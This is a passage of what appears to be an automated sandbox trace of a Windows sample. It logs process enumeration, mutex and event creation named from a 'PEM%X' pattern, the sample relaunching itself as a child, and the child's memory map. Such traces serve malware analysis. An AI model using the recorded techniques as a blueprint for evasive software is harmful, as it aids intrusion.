th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.808] GetCurrentProcessId () returned 0xe78 [0110.808] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.809] GetCurrentProcessId () returned 0xe78 [0110.809] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0110.809] GetCurrentProcessId () returned 0xe78 [0110.809] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x678, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.810] GetCurrentProcessId () returned 0xe78 [0110.810] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0110.811] GetCurrentProcessId () returned 0xe78 [0110.811] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x77c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0110.811] GetCurrentProcessId () returned 0xe78 [0110.811] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.812] GetCurrentProcessId () returned 0xe78 [0110.812] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0110.814] GetCurrentProcessId () returned 0xe78 [0110.814] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0110.815] GetCurrentProcessId () returned 0xe78 [0110.815] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0110.815] GetCurrentProcessId () returned 0xe78 [0110.815] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="commands xerox relationship.exe")) returned 1 [0110.816] GetCurrentProcessId () returned 0xe78 [0110.816] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nice-cu-characteristic.exe")) returned 1 [0110.817] GetCurrentProcessId () returned 0xe78 [0110.817] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shift.exe")) returned 1 [0110.818] GetCurrentProcessId () returned 0xe78 [0110.818] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="assuming.exe")) returned 1 [0110.818] GetCurrentProcessId () returned 0xe78 [0110.818] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fantasy-snap-charity.exe")) returned 1 [0110.819] GetCurrentProcessId () returned 0xe78 [0110.819] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="node_selections.exe")) returned 1 [0110.820] GetCurrentProcessId () returned 0xe78 [0110.820] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knitting.exe")) returned 1 [0110.820] GetCurrentProcessId () returned 0xe78 [0110.820] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="numericromancejake.exe")) returned 1 [0110.821] GetCurrentProcessId () returned 0xe78 [0110.821] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="casio flavor.exe")) returned 1 [0110.822] GetCurrentProcessId () returned 0xe78 [0110.822] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="friday_escape_populations.exe")) returned 1 [0110.824] GetCurrentProcessId () returned 0xe78 [0110.824] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="kg-tools.exe")) returned 1 [0110.824] GetCurrentProcessId () returned 0xe78 [0110.824] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="strengths_affected.exe")) returned 1 [0110.825] GetCurrentProcessId () returned 0xe78 [0110.825] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="broadcast officers.exe")) returned 1 [0110.826] GetCurrentProcessId () returned 0xe78 [0110.826] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bulgariageneratingprogram.exe")) returned 1 [0110.826] GetCurrentProcessId () returned 0xe78 [0110.826] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="orlando.exe")) returned 1 [0110.827] GetCurrentProcessId () returned 0xe78 [0110.827] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="facial_violence.exe")) returned 1 [0110.829] GetCurrentProcessId () returned 0xe78 [0110.829] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rings ownership printable.exe")) returned 1 [0110.829] GetCurrentProcessId () returned 0xe78 [0110.830] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="article.exe")) returned 1 [0110.830] GetCurrentProcessId () returned 0xe78 [0110.830] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.831] GetCurrentProcessId () returned 0xe78 [0110.831] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sample.exe")) returned 1 [0110.832] GetCurrentProcessId () returned 0xe78 [0110.832] CloseHandle (hObject=0xcc) returned 1 [0110.832] _snwprintf (in: _Dest=0x19fe60, _Count=0x40, _Format="PEM%X" | out: _Dest="PEM57C") returned 6 [0110.832] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="PEM57C") returned 0xcc [0110.832] GetLastError () returned 0x0 [0110.832] CloseHandle (hObject=0xcc) returned 1 [0110.832] _snwprintf (in: _Dest=0x19fe60, _Count=0x40, _Format="PEM%X" | out: _Dest="PEME78") returned 6 [0110.832] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="PEME78") returned 0xcc [0110.832] _snwprintf (in: _Dest=0x19fee0, _Count=0x40, _Format="PEE%X" | out: _Dest="PEEE78") returned 6 [0110.832] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="PEEE78") returned 0xd0 [0110.833] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fc58, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sample.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\sample.exe")) returned 0x28 [0110.833] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sample.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x80, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fbe0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fc28 | out: lpCommandLine=0x0, lpProcessInformation=0x19fc28*(hProcess=0xd8, hThread=0xd4, dwProcessId=0xe88, dwThreadId=0xe8c)) returned 1 [0110.850] WaitForSingleObject (hHandle=0xd0, dwMilliseconds=0xffffffff) returned 0x0 [0111.723] CloseHandle (hObject=0xd8) returned 1 [0111.723] CloseHandle (hObject=0xd4) returned 1 [0111.723] CloseHandle (hObject=0xd0) returned 1 [0111.723] CloseHandle (hObject=0xcc) returned 1 [0111.723] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0xe80 Process: id = "2" image_name = "sample.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\sample.exe" page_root = "0x18635000" os_pid = "0xe88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe78" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sample.exe\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013da5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 246 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 247 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 248 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 249 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 250 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 251 start_va = 0x400000 end_va = 0x470fff entry_point = 0x400000 region_type = mapped_file name = "sample.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\sample.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\sample.exe") Region: id = 252 start_va = 0x776b0000 end_va = 0x77828fff entry_point = 0x776b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 253 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 254 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 255 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 256 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 257 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 258 start_va = 0x7fff0000 end_va = 0x7ffc57b4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 259 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 260 start_va = 0x7ffc57d12000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc57d12000" filename = "" Region: id = 261 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 262 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 263 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 264 start_va = 0x5bab0000 end_va = 0x5bb22fff entry_point = 0x5bab0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 265 start_va = 0x5bb30000 end_va = 0x5bb7efff entry_point = 0x5bb30000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 266 start_va = 0x5baa0000 end_va = 0x5baa7fff entry_point = 0x5baa0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 267 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 268 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 269 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 270 start_va = 0x1c0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 271 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 272 start_va = 0x220000 end_va = 0x2ddfff entry_point = 0x220000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 273 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 274 start_va = 0x480000 end_va = 0x607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 275 start_va = 0x640000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 276 start_va = 0x7f0000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 277 start_va = 0x800000 end_va = 0x980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 278 start_va = 0x990000 end_va = 0x1d8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 279 start_va = 0x74750000 end_va = 0x747a8fff entry_point = 0x74750000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 280 start_va = 0x747b0000 end_va = 0x747b9fff entry_point = 0x747b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 281 start_va = 0x747c0000 end_va = 0x747ddfff entry_point = 0x747c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 282 start_va = 0x74a00000 end_va = 0x74aabfff entry_point = 0x74a00000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 283 start_va = 0x74df0000 end_va = 0x74f0ffff entry_point = 0x74df0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 284 start_va = 0x74f10000 end_va = 0x74f3afff entry_point = 0x74f10000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 285 start_va = 0x74f40000 end_va = 0x7502ffff entry_point = 0x74f40000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 286 start_va = 0x75030000 end_va = 0x7517cfff entry_point = 0x75030000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 287 start_va = 0x75190000 end_va = 0x75305fff entry_point = 0x75190000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 288 start_va = 0x76c70000 end_va = 0x76daffff entry_point = 0x76c70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 289 start_va = 0x76f20000 end_va = 0x76fddfff entry_point = 0x76f20000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 290 start_va = 0x772b0000 end_va = 0x772f2fff entry_point = 0x772b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 291 start_va = 0x77550000 end_va = 0x775cafff entry_point = 0x77550000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 292 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 293 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 294 start_va = 0x3e0000 end_va = 0x3f4fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 295 start_va = 0x610000 end_va = 0x623fff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 296 start_va = 0x740000 end_va = 0x759fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 297 start_va = 0x400000 end_va = 0x419fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 298 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 299 start_va = 0x1d90000 end_va = 0x1e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 300 start_va = 0x420000 end_va = 0x433fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 301 start_va = 0x440000 end_va = 0x446fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 302 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 303 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 304 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 305 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 306 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 307 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 308 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 309 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 310 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 311 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 312 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 313 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 314 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 315 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 316 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 317 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 318 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 319 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 320 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 321 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 322 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 323 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 324 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 325 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 326 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 327 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 328 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 329 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 330 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 331 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 332 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 333 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 334 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" 